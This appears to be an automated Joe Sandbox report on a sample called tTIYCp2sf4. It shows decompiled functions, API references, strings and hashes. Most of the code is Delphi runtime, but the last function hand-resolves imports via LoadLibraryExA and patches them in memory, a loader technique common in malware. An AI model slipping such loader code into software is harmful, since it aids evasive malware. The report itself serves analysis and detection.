Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: f9222adb8287419d8e47ef7830557a4460cc34ec355375701b8854e52967e642
Instruction ID: 4796e6fe32a10305d17db4fee496c742aa80ce7c98e437a56d56226d36325f1b
Opcode Fuzzy Hash: f9222adb8287419d8e47ef7830557a4460cc34ec355375701b8854e52967e642
Instruction Fuzzy Hash: A8F0B27C9443519FC350DF28E845A15BBE9FB88B95F408D69E999C7380EB34D818CF52

Uniqueness

Uniqueness Score: -1.00%

Function 0285A7F4 Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0285A7F4(int __eax, signed int __ecx, int __edx) {
				char _v16;
				signed int _t5;
				signed int _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16 & 0x000000ff;
				}
				return _t5;
			}

0x0285a7f7
0x0285a7f8
0x0285a80e
0x0285a816
0x0285a810
0x0285a810
0x0285a810
0x0285a81c

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0285BE56,00000000,0285C06F,?,?,00000000,00000000), ref: 0285A807

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6184780ab990e1c9c994eeefedfa7bdff7a128ca2a0de256d680c4560d72c245
Instruction ID: 17d1a07a22af4429d99c2456eb4f008fbb2a4e3796e87ccbbbf3291f2271807a
Opcode Fuzzy Hash: 6184780ab990e1c9c994eeefedfa7bdff7a128ca2a0de256d680c4560d72c245
Instruction Fuzzy Hash: 3BD05E6E31E2702AE224515A6D84DBB5ADCCAC67A1F00813EB988C7101E2048C0697B1

Uniqueness

Uniqueness Score: -1.00%

Function 028591F0 Relevance: 1.5, APIs: 1, Instructions: 6
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E028591F0() {
				struct _SYSTEMTIME* _t2;

				GetLocalTime(_t2);
				return _t2->wYear & 0x0000ffff;
			}

0x028591f4
0x02859200

APIs

GetLocalTime.KERNEL32 ref: 028591F4

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: b502372fb5b23bac125662bc6bb717f94965c76aef423a1f4f3b06eec63c2f99
Instruction ID: 0614c6ddd2df66c4b36abcf4256c09194277fd4d95e51c5834278a7a5c0dc082
Opcode Fuzzy Hash: b502372fb5b23bac125662bc6bb717f94965c76aef423a1f4f3b06eec63c2f99
Instruction Fuzzy Hash: ABA01108808832028A803B2C0C0223A30C8A800A20FC80B80ACF8802E2FA2E022880E3

Uniqueness

Uniqueness Score: -1.00%

Function 02897D7C Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

F, xrefs: 02897E18

Memory Dump Source

Source File: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: d6ffe21d2d941e64807bf3424b63dbe30d820b4283a3ce816c806b92c1b66454
Instruction ID: 39a05f27351074f96064fb9f4e508700951c33ea825609af86fd471a0efc5636
Opcode Fuzzy Hash: d6ffe21d2d941e64807bf3424b63dbe30d820b4283a3ce816c806b92c1b66454
Instruction Fuzzy Hash: 095132B9F142098BEB09CE6DC8907AEF6E7ABC8314F588079D509E7380EB745E058754

Uniqueness

Uniqueness Score: -1.00%

Function 0287B30F Relevance: .4, Instructions: 372COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e72b05c9f72d7b1b0b82fb8626393fb8d2f34d5ddac7137c58889079514876d8
Instruction ID: 8b8fd3fddc1d082cd2261a7b070ad1c8e883e926c58e4d1047d257333d899dce
Opcode Fuzzy Hash: e72b05c9f72d7b1b0b82fb8626393fb8d2f34d5ddac7137c58889079514876d8
Instruction Fuzzy Hash: A7D1547DA00246AFDB15CFB89C807AABBF7AF09308F1880BAD548D3241E775DA50CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0288506C Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da1b029b2c8cd817535cc31f51fa5df94214df832fd31e041a81918ffc2b5124
Instruction ID: 361356259efb29de1d612c9851e0cd3cfc50662e375e4439ef31a38c1add7a0b
Opcode Fuzzy Hash: da1b029b2c8cd817535cc31f51fa5df94214df832fd31e041a81918ffc2b5124
Instruction Fuzzy Hash: CBA1B33CA00516AFDF05AF2DCC44BBE77A7EFC6314F188164E415EB295CB7499028B66

Uniqueness

Uniqueness Score: -1.00%

Function 028520C4 Relevance: .1, Instructions: 94
COMMONCrypto

Download Yara Rule

C-Code - Quality: 51%

			E028520C4(void* __eax, char* __edx) {
				char* _t103;

				_t103 = __edx;
				_t39 = __eax + 1;
				 *__edx = 0xffffffff89705f71;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = ((((((((((__eax + 0x00000001) * 0x89705f41 >> 0x00000020 & 0x1fffffff) + 0xfffffffe25c17d04 + (_t39 * 0x89705f41 >> 0x0000001e) & 0x0fffffff) + 0xfffffffe25c17d04 & 0x07ffffff) + 0xfffffffe25c17d04 & 0x03ffffff) + 0xfffffffe25c17d04 & 0x01ffffff) + 0xfffffffe25c17d04 & 0x00ffffff) + 0xfffffffe25c17d04 & 0x007fffff) + 0xfffffffe25c17d04 & 0x003fffff) + 0xfffffffe25c17d04 & 0x001fffff) + 0xfffffffe25c17d04 >> 0x00000014 | 0x00000030;
				_t37 = _t103 + 1; // 0x1
				return _t37;
			}

0x028520c5
0x028520c7
0x028520e9
0x028520f0
0x02852101
0x0285210c
0x0285211d
0x02852128
0x02852139
0x02852144
0x02852155
0x02852160
0x02852171
0x0285217c
0x0285218d
0x02852198
0x028521a9
0x028521b4
0x028521c5
0x028521cd
0x028521d6
0x028521d8
0x028521dc

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Uniqueness

Uniqueness Score: -1.00%

Function 0285D278 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0285D278() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x28a622c = E0285D24C("VariantChangeTypeEx", E0285CDE4, _t91);
				 *0x28a6230 = E0285D24C("VarNeg", E0285CE14, _t91);
				 *0x28a6234 = E0285D24C("VarNot", E0285CE14, _t91);
				 *0x28a6238 = E0285D24C("VarAdd", E0285CE20, _t91);
				 *0x28a623c = E0285D24C("VarSub", E0285CE20, _t91);
				 *0x28a6240 = E0285D24C("VarMul", E0285CE20, _t91);
				 *0x28a6244 = E0285D24C("VarDiv", E0285CE20, _t91);
				 *0x28a6248 = E0285D24C("VarIdiv", E0285CE20, _t91);
				 *0x28a624c = E0285D24C("VarMod", E0285CE20, _t91);
				 *0x28a6250 = E0285D24C("VarAnd", E0285CE20, _t91);
				 *0x28a6254 = E0285D24C("VarOr", E0285CE20, _t91);
				 *0x28a6258 = E0285D24C("VarXor", E0285CE20, _t91);
				 *0x28a625c = E0285D24C("VarCmp", E0285CE2C, _t91);
				 *0x28a6260 = E0285D24C("VarI4FromStr", E0285CE38, _t91);
				 *0x28a6264 = E0285D24C("VarR4FromStr", E0285CEA4, _t91);
				 *0x28a6268 = E0285D24C("VarR8FromStr", E0285CF10, _t91);
				 *0x28a626c = E0285D24C("VarDateFromStr", E0285CF7C, _t91);
				 *0x28a6270 = E0285D24C("VarCyFromStr", E0285CFE8, _t91);
				 *0x28a6274 = E0285D24C("VarBoolFromStr", E0285D054, _t91);
				 *0x28a6278 = E0285D24C("VarBstrFromCy", E0285D0D4, _t91);
				 *0x28a627c = E0285D24C("VarBstrFromDate", E0285D144, _t91);
				_t46 = E0285D24C("VarBstrFromBool", E0285D1B8, _t91);
				 *0x28a6280 = _t46;
				return _t46;
			}

0x0285d286
0x0285d29a
0x0285d2b0
0x0285d2c6
0x0285d2dc
0x0285d2f2
0x0285d308
0x0285d31e
0x0285d334
0x0285d34a
0x0285d360
0x0285d376
0x0285d38c
0x0285d3a2
0x0285d3b8
0x0285d3ce
0x0285d3e4
0x0285d3fa
0x0285d410
0x0285d426
0x0285d43c
0x0285d452
0x0285d462
0x0285d468
0x0285d46f

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0285D281

Part of subcall function 0285D24C: GetProcAddress.KERNEL32(00000000), ref: 0285D265

Strings

VarCyFromStr, xrefs: 0285D405
VarSub, xrefs: 0285D2E7
VarMod, xrefs: 0285D33F
VarI4FromStr, xrefs: 0285D3AD
VarBstrFromCy, xrefs: 0285D431
VariantChangeTypeEx, xrefs: 0285D28F
VarR8FromStr, xrefs: 0285D3D9
VarOr, xrefs: 0285D36B
VarNot, xrefs: 0285D2BB
VarDiv, xrefs: 0285D313
VarNeg, xrefs: 0285D2A5
VarMul, xrefs: 0285D2FD
VarBoolFromStr, xrefs: 0285D41B
VarBstrFromDate, xrefs: 0285D447
VarCmp, xrefs: 0285D397
VarBstrFromBool, xrefs: 0285D45D
VarAdd, xrefs: 0285D2D1
VarXor, xrefs: 0285D381
VarR4FromStr, xrefs: 0285D3C3
VarDateFromStr, xrefs: 0285D3EF
VarAnd, xrefs: 0285D355
oleaut32.dll, xrefs: 0285D27C
VarIdiv, xrefs: 0285D329

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 0fbdd21e251e7a914c403d6d4adf64a2e395937893af145874cfd5f8d11e3f00
Instruction ID: 52f32b1145df7c834614cfc81ad9dbe4376f5a2554cf6d81019762ef6830cf2f
Opcode Fuzzy Hash: 0fbdd21e251e7a914c403d6d4adf64a2e395937893af145874cfd5f8d11e3f00
Instruction Fuzzy Hash: 1D41477DA443355FAA086B6DB400427B7DED784710364801BBE08CB799EEB0FC59DE6A

Uniqueness

Uniqueness Score: -1.00%

Function 02852530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254
windowCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E02852530(void* __eax, void* __fp0) {
				void* _v8;
				char _v110600;
				char _v112644;
				char _v112645;
				signed int _v112652;
				char _v112653;
				char _v112654;
				char _v112660;
				intOrPtr _v112664;
				intOrPtr _v112668;
				intOrPtr _v112672;
				struct HWND__* _v112676;
				signed short* _v112680;
				intOrPtr* _v112684;
				char _v129068;
				char _v131117;
				char _v161836;
				void* _v162091;
				signed char _v162092;
				void* _t73;
				int _t79;
				signed int _t126;
				int _t131;
				intOrPtr _t132;
				char* _t134;
				char* _t135;
				char* _t136;
				char* _t137;
				char* _t138;
				char* _t139;
				char* _t141;
				char* _t142;
				char* _t147;
				char* _t148;
				intOrPtr _t180;
				void* _t182;
				void* _t184;
				void* _t185;
				intOrPtr* _t188;
				intOrPtr* _t189;
				signed int _t194;
				void* _t197;
				void* _t198;
				void* _t211;

				_push(__eax);
				_t73 = 0x27;
				goto L1;
				L12:
				while(_t180 != 0x28a3708) {
					_t79 = E02852048(_t180);
					_t131 = _t79;
					__eflags = _t131;
					if(_t131 == 0) {
						L11:
						_t180 =  *((intOrPtr*)(_t180 + 4));
						continue;
					} else {
						goto L4;
					}
					do {
						L4:
						_t194 =  *(_t131 - 4);
						__eflags = _t194 & 0x00000001;
						if((_t194 & 0x00000001) == 0) {
							__eflags = _t194 & 0x00000004;
							if(__eflags == 0) {
								__eflags = _v112652 - 0x1000;
								if(_v112652 < 0x1000) {
									_v112664 = (_t194 & 0xfffffff0) - 4;
									_t126 = E0285238C(_t131);
									__eflags = _t126;
									if(_t126 == 0) {
										_v112645 = 0;
										 *((intOrPtr*)(_t197 + _v112652 * 4 - 0x1f828)) = _v112664;
										_t18 =  &_v112652;
										 *_t18 = _v112652 + 1;
										__eflags =  *_t18;
									}
								}
							} else {
								E028523E4(_t131, __eflags, _t197);
							}
						}
						_t79 = E02852024(_t131);
						_t131 = _t79;
						__eflags = _t131;
					} while (_t131 != 0);
					goto L11;
				}
				_t132 =  *0x28a57b0; // 0x7ebd0000
				while(_t132 != 0x28a57ac && _v112652 < 0x1000) {
					_t79 = E0285238C(_t132 + 0x10);
					__eflags = _t79;
					if(_t79 == 0) {
						_v112645 = 0;
						_t22 = _t132 + 0xc; // 0x80004
						_t79 = _v112652;
						 *((intOrPtr*)(_t197 + _t79 * 4 - 0x1f828)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4;
						_t27 =  &_v112652;
						 *_t27 = _v112652 + 1;
						__eflags =  *_t27;
					}
					_t29 = _t132 + 4; // 0x7ec50000
					_t132 =  *_t29;
				}
				if(_v112645 != 0) {
					L48:
					return _t79;
				}
				_v112653 = 0;
				_v112668 = 0;
				_t134 = E028521E0(0x28,  &_v161836);
				_v112660 = 0x37;
				_v112680 = 0x2877042;
				_v112684 =  &_v110600;
				do {
					_v112672 = ( *_v112680 & 0x0000ffff) - 4;
					_v112654 = 0;
					_t182 = 0xff;
					_t188 = _v112684;
					while(_t134 <=  &_v131117) {
						if( *_t188 > 0) {
							if(_v112653 == 0) {
								_t134 = E028521E0(0x27, _t134);
								_v112653 = 1;
							}
							if(_v112654 != 0) {
								 *_t134 = 0x2c;
								_t139 = _t134 + 1;
								 *_t139 = 0x20;
								_t140 = _t139 + 1;
								__eflags = _t139 + 1;
							} else {
								 *_t134 = 0xd;
								 *((char*)(_t134 + 1)) = 0xa;
								_t147 = E028520C4(_v112668 + 1, _t134 + 2);
								 *_t147 = 0x20;
								_t148 = _t147 + 1;
								 *_t148 = 0x2d;
								 *((char*)(_t148 + 1)) = 0x20;
								_t140 = E028521E0(8, E028520C4(_v112672, _t148 + 2));
								_v112654 = 1;
							}
							_t211 = _t182 - 1;
							if(_t211 < 0) {
								_t141 = E028521E0(7, _t140);
							} else {
								if(_t211 == 0) {
									_t141 = E028521E0(6, _t140);
								} else {
									E0285363C( *((intOrPtr*)(_t188 - 4)),  &_v162092);
									_t141 = E028521E0(_v162092 & 0x000000ff, _t140);
								}
							}
							 *_t141 = 0x20;
							_t142 = _t141 + 1;
							 *_t142 = 0x78;
							 *((char*)(_t142 + 1)) = 0x20;
							_t134 = E028520C4( *_t188, _t142 + 2);
						}
						_t182 = _t182 - 1;
						_t188 = _t188 - 8;
						if(_t182 != 0xffffffff) {
							continue;
						} else {
							goto L37;
						}
					}
					L37:
					_v112668 = _v112672;
					_v112684 = _v112684 + 0x800;
					_v112680 =  &(_v112680[0x10]);
					_t60 =  &_v112660;
					 *_t60 = _v112660 - 1;
				} while ( *_t60 != 0);
				if(_v112652 <= 0) {
					L47:
					E028521E0(3, _t134);
					_t79 = MessageBoxA(0,  &_v161836, "Unexpected Memory Leak", 0x2010);
					goto L48;
				}
				if(_v112653 != 0) {
					 *_t134 = 0xd;
					_t136 = _t134 + 1;
					 *_t136 = 0xa;
					_t137 = _t136 + 1;
					 *_t137 = 0xd;
					_t138 = _t137 + 1;
					 *_t138 = 0xa;
					_t134 = _t138 + 1;
				}
				_t134 = E028521E0(0x3c, _t134);
				_t184 = _v112652 - 1;
				if(_t184 >= 0) {
					_t185 = _t184 + 1;
					_v112676 = 0;
					_t189 =  &_v129068;
					L43:
					L43:
					if(_v112676 != 0) {
						 *_t134 = 0x2c;
						_t135 = _t134 + 1;
						 *_t135 = 0x20;
						_t134 = _t135 + 1;
					}
					_t134 = E028520C4( *_t189, _t134);
					if(_t134 >  &_v131117) {
						goto L47;
					}
					_v112676 =  &(_v112676->i);
					_t189 = _t189 + 4;
					_t185 = _t185 - 1;
					if(_t185 != 0) {
						goto L43;
					}
				}
				L1:
				_t198 = _t198 + 0xfffff004;
				_push(_t73);
				_t73 = _t73 - 1;
				if(_t73 != 0) {
					goto L1;
				} else {
					E02853098( &_v112644, 0x1b800);
					E02853098( &_v129068, 0x4000);
					_t79 = 0;
					_v112652 = 0;
					_v112645 = 1;
					_t180 =  *0x28a370c; // 0x3fd0000
					goto L12;
				}
			}

0x02852533
0x02852534
0x02852534
0x00000000
0x0285260f
0x0285258f
0x02852594
0x02852596
0x02852598
0x0285260c
0x0285260c
0x00000000
0x00000000
0x00000000
0x00000000
0x0285259a
0x0285259a
0x0285259f
0x028525a1
0x028525a7
0x028525a9
0x028525af
0x028525bc
0x028525c6
0x028525ce
0x028525d6
0x028525db
0x028525dd
0x028525df
0x028525f2
0x028525f9
0x028525f9
0x028525f9
0x028525f9
0x028525dd
0x028525b1
0x028525b4
0x028525b9
0x028525af
0x02852601
0x02852606
0x02852608
0x02852608
0x00000000
0x0285259a
0x0285261b
0x0285265a
0x02852628
0x0285262d
0x0285262f
0x02852631
0x02852638
0x02852644
0x0285264a
0x02852651
0x02852651
0x02852651
0x02852651
0x02852657
0x02852657
0x02852657
0x02852675
0x028528d3
0x028528d9
0x028528d9
0x0285267b
0x02852684
0x0285269f
0x028526a1
0x028526ab
0x028526bb
0x028526c1
0x028526cd
0x028526d3
0x028526da
0x028526e5
0x028526e7
0x028526f8
0x02852705
0x02852718
0x0285271a
0x0285271a
0x02852728
0x02852779
0x0285277c
0x0285277d
0x02852780
0x02852780
0x0285272a
0x0285272a
0x0285272e
0x02852740
0x02852742
0x02852745
0x02852746
0x0285274a
0x0285276e
0x02852770
0x02852770
0x02852783
0x02852786
0x0285279d
0x02852788
0x02852788
0x028527b2
0x0285278a
0x028527bf
0x028527d8
0x028527d8
0x02852788
0x028527da
0x028527dd
0x028527de
0x028527e2
0x028527ef
0x028527ef
0x028527f1
0x028527f2
0x028527f8
0x00000000
0x00000000
0x00000000
0x00000000
0x028527f8
0x028527fe
0x02852804
0x0285280a
0x02852814
0x0285281b
0x0285281b
0x0285281b
0x0285282e
0x028528aa
0x028528b6
0x028528ce
0x00000000
0x028528ce
0x02852837
0x02852839
0x0285283c
0x0285283d
0x02852840
0x02852841
0x02852844
0x02852845
0x02852848
0x02852848
0x0285285a
0x02852862
0x02852865
0x02852867
0x02852868
0x02852872
0x00000000
0x02852878
0x0285287f
0x02852881
0x02852884
0x02852885
0x02852888
0x02852888
0x02852892
0x0285289c
0x00000000
0x00000000
0x0285289e
0x028528a4
0x028528a7
0x028528a8
0x00000000
0x00000000
0x028528a8
0x02852539
0x02852539
0x0285253f
0x02852540
0x02852541
0x00000000
0x02852543
0x0285255c
0x0285256e
0x02852573
0x02852575
0x0285257b
0x02852582
0x00000000
0x02852582

APIs

MessageBoxA.USER32 ref: 028528CE

Strings

, xrefs: 02852814
7, xrefs: 028526A1
Unknown, xrefs: 0285278C
bytes: , xrefs: 0285275D
String, xrefs: 028527A1
An unexpected memory leak has occurred. , xrefs: 02852690
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02852849
Unexpected Memory Leak, xrefs: 028528C0
The unexpected small block leaks are:, xrefs: 02852707

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: aeacb62946a72e6f41931abd65d2f3f17238cd824225a1824a45e02d780443b8
Instruction ID: b61f54cd82f104701cc7c7f59d9fb62dd7ab9707939217bcac99d40fe006a1b3
Opcode Fuzzy Hash: aeacb62946a72e6f41931abd65d2f3f17238cd824225a1824a45e02d780443b8
Instruction Fuzzy Hash: D8A1E73CA042748BDF219A2CCC80B99BAE5EB09354F1441E5ED4DEB38ACF759989CF51

Uniqueness

Uniqueness Score: -1.00%

Function 028681C0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E028681C0(intOrPtr _a4, void* _a8) {
				void* _v8;
				struct HINSTANCE__* _v12;
				intOrPtr _v16;
				int _t23;
				void* _t49;
				void* _t51;
				void* _t52;

				_t51 = _a8;
				while(1) {
					_t23 = IsBadReadPtr(_t51, 0x14);
					if(_t23 != 0 ||  *((intOrPtr*)(_t51 + 0x10)) == 0 ||  *((intOrPtr*)(_t51 + 0xc)) == 0) {
						break;
					}
					_v8 =  *((intOrPtr*)(_t51 + 0xc)) + _a4;
					if(IsBadReadPtr(_v8, 4) != 0) {
						L13:
						_t51 = _t51 + 0x14;
						continue;
					}
					 *0x28a639c = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\KernelBase.dll"), "LoadLibraryExA");
					_v12 =  *0x28a639c(_v8, 0, 0);
					_t49 =  *((intOrPtr*)(_t51 + 0x10)) + _a4;
					_t52 = _t49;
					if( *((intOrPtr*)(_t51 + 4)) == 0xffffffff) {
						_t49 =  *_t51 + _a4;
					}
					while(IsBadReadPtr(_t49, 4) == 0 && IsBadReadPtr(_t52, 2) == 0 &&  *_t49 != 0) {
						if(E02867A60(0, _t52, 4, 0x40, _v16) != 0) {
							if(( *(_t49 + 3) & 0x00000080) == 0) {
								 *_t52 = GetProcAddress(_v12, _a4 +  *_t49 + 2);
							} else {
								 *_t52 = GetProcAddress(_v12,  *_t49 & 0x0000ffff);
							}
							E02867A60(0, _t52, 4, _v16, _v16);
						}
						_t49 = _t49 + 4;
						_t52 = _t52 + 4;
					}
					goto L13;
				}
				return _t23;
			}

0x028681c9
0x028682a8
0x028682ab
0x028682b2
0x00000000
0x00000000
0x028681d7
0x028681e7
0x028682a5
0x028682a5
0x00000000
0x028682a5
0x02868202
0x02868215
0x0286821b
0x0286821e
0x02868224
0x02868228
0x02868228
0x02868288
0x0286823f
0x02868245
0x0286826e
0x02868247
0x02868258
0x02868258
0x0286827d
0x0286827d
0x02868282
0x02868285
0x02868285
0x00000000
0x02868288
0x028682ca

APIs

IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 028681E0
GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 028681F7
GetProcAddress.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 028681FD
IsBadReadPtr.KERNEL32(?,00000004), ref: 0286828B
IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 02868297
IsBadReadPtr.KERNEL32(?,00000014), ref: 028682AB

Strings

LoadLibraryExA, xrefs: 028681ED
C:\Windows\System32\KernelBase.dll, xrefs: 028681F2

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
